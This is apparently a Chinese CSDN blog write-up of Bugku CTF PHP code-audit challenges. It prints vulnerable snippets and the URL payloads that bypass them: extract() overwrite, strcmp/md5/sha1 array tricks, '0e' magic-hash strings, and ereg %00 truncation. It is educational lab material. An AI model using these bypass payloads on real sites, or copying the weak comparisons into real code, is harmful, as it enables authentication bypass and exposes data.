代码审计----bugku

最新推荐文章于 2023-04-05 13:40:10 发布
最新推荐文章于 2023-04-05 13:40:10 发布
阅读量269 收藏 1
点赞数 1
分类专栏: CTF 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43726480/article/details/105954017
版权

1.extract变量覆盖

<?
php$flag='xxx';
extract($_GET);
 if(isset($shiyan)) 
 { $content=trim(file_get_contents($flag));
  if($shiyan==$content) 
  { echo'flag{xxx}'; } 
  else { echo'Oh.no'; } }?>
Extract()函数引起的变量覆盖漏洞

该函数使用数组键名作为变量名,使用数组键值作为变量值。但是当变量中有同名的元素时,该函数默认将原有的值给覆盖掉。这就造成了变量覆盖漏洞。

构造 http://123.206.87.240:9009/1.php?shiyan=&flag=即可

2.strcmp比较字符串

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
//比较两个字符串(区分大小写)
die('Flag: '.$flag);
else
print 'No';
}
?>

strcmp ()的检查可以用数组绕过,数组与字符串的比较返回 null (0 == null 返回true)
构造 http://123.206.87.240:9009/6.php?a[]=hjy即可

3.urldecode二次编码绕过

<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("

not allowed!
");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "

Access granted!
";
echo "

flag
";
}
?>

url传入的时候,浏览器解析了一次,然后,代码中的urldecode ()函数又解析了一下。
h 的url 编码 为 %68
%68 的url编码 为 %2568
构造http://123.206.87.240:9009/10.php?id=%2568ackerDJ即可

4.md5()函数

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>

有两种方法绕过:

1,md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。

2,利用==比较漏洞
如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。
下列的字符串的MD5值都是0e开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

构造http://123.206.87.240:9009/18.php?username[]=hjy&password[]=dasda即可

5.数组返回NULL绕过

<?php
$flag = "flag";

if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo 'You password must be alphanumeric';
else if (strpos ($_GET['password'], '--') !== FALSE)
die('Flag: ' . $flag);
else
echo 'Invalid password';
}
?>

“[A-Za-z0-9]"
方括号表示字符集,[A-Za-z0-9]匹配大小写字母和数字其中一个字符

“^[A-Za-z0-9]$"
^表示字符串开始,$表示字符串结束 ,这个匹配只有一个大小写字母和数字字符的字符串

“^[A-Za-z0-9]+$"
+号表示重复1到多次,匹配由多个数字大小字母组成的字符串
阅读代码,本题需要满足的条件

必须以数字或者字母开头(其实看到ereg就可以想到%00截断);
必须在password参数中找到–。

所以得到 index.php?password=a%00–

但是:

ereg只能处理字符,而你是数组,所以返回的是null,三个等号的时候不会进行类型转换。所以null不等于false

strpos的参数同样不能够是数组,所以返回的依旧是null,null不等于false也是正确。

即:倘若函数的参数不符合其函数要求的时候返回的是null值
即 ?password[]=0

6.弱类型整数大小比较绕过

$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
echo $flag;

不能为数字
这个数字大于1336

大多数php函数无法判断数组。
数组绕过
或者 password = 31123aadasdas 也行

7.sha()函数比较绕过

<?php
$flag = "flag";
if (isset($_GET['name']) and isset($_GET['password']))
{
var_dump($_GET['name']);
echo "
";
var_dump($_GET['password']);
var_dump(sha1($_GET['name']));
var_dump(sha1($_GET['password']));
if ($_GET['name'] == $_GET['password'])
echo '
Your password can not be your name!
';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '
Invalid password.
';
}
else
echo '
Login first!
';
?>

还是利用数组绕过,sha1()和MD5()处理数组时,不报错,直接返回false

8.md5加密相等绕过

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,

所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

而以下这些字符串,md5哈希之后都是0e开头的:

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

9.十六进制与数字比较

<?php
error_reporting(0);
function noother_says_correct($temp)
{
$flag = 'flag{test}';
$one = ord('1'); //ord — 返回字符的 ASCII 码值
$nine = ord('9'); //ord — 返回字符的 ASCII 码值
$number = '3735929054';
// Check all the input characters!
for ($i = 0; $i < strlen($number); $i++)
{
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>

php在转码时会把16进制转化为十进制.于是把
3735929054转换成16进制为0xdeadc0de,

10.变量覆盖

emem, 貌似打不开?!?

11.ereg正则%00截断

<?php
$flag = "xxx";
if (isset ($_GET['password']))
{
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
{
echo '

You password must be alphanumeric
';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '-') !== FALSE) //strpos — 查找字符串首次出现的位置
{
die('Flag: ' . $flag);
}
else
{
echo('

- have not been found
');
}
}
else
{
echo '

Invalid password
';
}
}
?>

解题方法1:利用数组绕过这两个函数

ereg() 只能处理字符串,而password是数组,所以返回的是null,三个等号的时候不会进行类型转换。所以null!==false。

strpos() 的参数同样不能够是数组,所以返回的依旧是null,null!==false也正确。

Payload:http://123.206.87.240:9009/5.php?password[]=1
解题方法2:%00截断绕过正则匹配

判断是不是长度<8且>9999999

判断是不是有“-
Payload:http://123.206.87.240:9009/5.php?password=1e9%00*-*

12.strpos数组绕过

<?php
$flag = "flag";
if (isset ($_GET['ctf'])) {
if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
echo '必须输入数字才行';
else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '骚年,继续努力吧啊~';
}
?>

但是两个函数都可以用数组进行绕过

payload

http://123.206.87.240:9009/15.php?ctf[]=1

小白的劝退之路
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf php侧漏,【CTF】PHP漏洞(学习积累中)
weixin_32534653的博客
04-01 523
1. strcmp字符串比较strcmp() 函数比较两个字符串,且对大小写敏感语法:strcmp(string1,string2);strcmp函数比较字符串的本质是将两个变量转换为ascii,然后进行减法运算,然后根据运算结果来决定返回值。0 - 如果两个字符串相等<0 - 如果 string1 小于 string2>0 - 如果 string1 大于 string2define(...
这是一道见到的web
a1b2c3是弱口令
08-13 1183
代码如下: &lt;?php echo "这是一道简单的WEB"; $flag = "XXXXXXXXX"; if (isset($_GET['password'])) { if (strcmp($_GET['password'], $flag) == 0) die('Flag: '.$flag); else print 'Invali...
PHP弱类型之strcmp绕过
weixin_45082914的博客
08-18 3885
PHP弱类型之strcmp绕过 strcmp(string $str1,string $str2) strcmp是比较两个字符串,如果str1<str2 则返回<0 如果str1大于str2返回>0 如果两者相等 返回0。 strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错。正是利用这点进行绕过。 flag[]=xxx 》》strcmp比较出错 》》返回null 》》null==0 ...
PHP代码审计系列(二)
tpaer的博客
12-06 649
本系列将收集多个PHP代码安全审计项目从易到难,并加入个人详细的源码解读。此系列将进行持续更新。
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
代码审计--源代码审计思路
02-24
但是同样会有很多弊端,通过逆向回溯的方式只能对通用漏洞进行快速审计,不能全面挖掘更有价值的漏洞,如果在时间允许的情况下,企业中安全运营对自身产品进行代码审计,就需要了解整个应用的业务逻辑,比如越权类...
php代码审计-代码执行.pdf
12-14
一些php代码审计的笔记
代码审计-企业级Web代码安全架构-247页.zip
10-08
代码审计-企业级Web代码安全架构-247页。全方位介绍代码审计,从审计环境到审计思路、工具的使用以及功能的安全设计原则,涵盖大量的工具和方法。
PHP-code-audit代码审计源码
01-02
php code audit for cms vulnerabilities / 代码审计,对一些大型cms漏洞的复现研究,更新源码和漏洞exp
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1441
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
php黑魔法
qq_44005305的博客
01-13 362
这个代码是关于switch的小bug,比如让我们包含当前目录中的flag.php,给which为flag,这里会发现在case 0和case 1的时候,没有break,按照常规思维,应该是0比较不成功,进入比较1,然后比较2,再然后进入default,但是事实却不是这样,事实上,在 case 0的时候,字符串和0比较是相等的,进入了case 0的方法体,但是却没有break,这个时候,默认判断已经比较成功了,而如果匹配成功之后,会继续执行后面的语句,这个时候,是不会再继续进行任何判断的。
ctf图片隐藏flag密码_利用php中双等于和三等于的区别,无需密码拿到flag
weixin_39633165的博客
12-28 1636
这是一道CTF中常见的题目,我们来看一下题目描述(其实ctf中题目描述很多都是没用的,甚至还会误导我们)题目描述先让我们找密码:打开这个页面,似乎并没用什么东西出现。根据经验我们要看一下源码有没有东西!右键查看源码:发现有个注释掉的index.txt我们来看一下index.txt,果真提示性代码出来了。isset($_GET['password'])//满足passwd不为null s...
php strcmp()漏洞
cherrie007的博客
08-22 1万+
strcmp漏洞
VishwaCTF2023
weixin_63305110的博客
04-05 90
但是我不理解的是,为什么之前尝试username[] 没有成功,仅限于password单独为数组的时候才会报错。太离谱了,git泄露,不需要githacker,泄露了github地址,直接跟过去得到 flaggg.md。太离谱了,git泄露,不需要githacker,泄露了github地址,直接跟过去得到 flaggg.md。只增加了 btn一个参数也没有值,猜测回显条件为。可以执行命令,但只会回显bool。根据flag看应该是非预期。太慢了,搞出来一个非预期。访问后base64解码。
ctf php黑魔法,php黑魔法
weixin_39964833的博客
03-11 232
Post Views:12,863零、前言这里必须得说一下==和===这俩货的重要性。==是比较运算,它不会去检查条件式的表达式的类型,===是恒等,它会检查查表达式的值与类型是否相等,NULL,0,”0″,array()使用==和false比较时,都是会返回true的,而使用===却不会。一、数组0x01 数组的hash计算很多时候,PHP数组都发挥了至关重要的作用,比如下面代码error_...
bugku strcmp比较字符串
m0_52432374的博客
03-24 575
Bugkustrcmp比较字符串 <?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag: '.$flag); else print 'No'; } ?> strcmp() strcm
Bugku - 代码审计 | strcmp()漏洞
多崎巡礼的博客
08-23 1893
php strcmp bypass漏洞 在PHP 5.3版本以上的strcmp()有一个bypass漏洞,在说这个漏洞之前我们先来看一下strcmp()这个函数。   int strcmp ( string $str1 , string $str2 ) 如果 str1 小于 str2 返回 &lt; 0; 如果 str1 大于 str2 返回 &gt; 0;如果两者相等,返回 0。(注...
Bugku代码审计
秋叶依剑
11-25 370
文章目录Bugku代码审计0x01. extrack 变量覆盖trim()函数payload0x02. strcmp比较字符串strcmp()函数0x03. urldecode二次编码绕过eregi()函数payload0x04. md5()函数payload0x05. 数组返回NULL绕过payload Bugku代码审计 0x01. extrack 变量覆盖 <?php $flag='x...
Bugkustrcmp比较字符串
王嘟嘟的博客
10-26 2470
0x00 前言 这个是代码审计的题目。 题目 0x01 Start 首先我们来看一下源码: &lt;?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 &lt; 0; 如果 str1大于 str2返回 &gt; 0;如果两者相等,...
PHP代码审计-php-hash比较缺陷
最新发布
07-08
对于PHP代码审计中的php-hash比较缺陷,我可以给你一些相关的信息。在PHP中,使用"=="操作符进行字符串比较时,存在一些问题。这是因为"=="操作符在比较字符串时会进行类型转换,可能导致意外的结果。具体来说,当...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值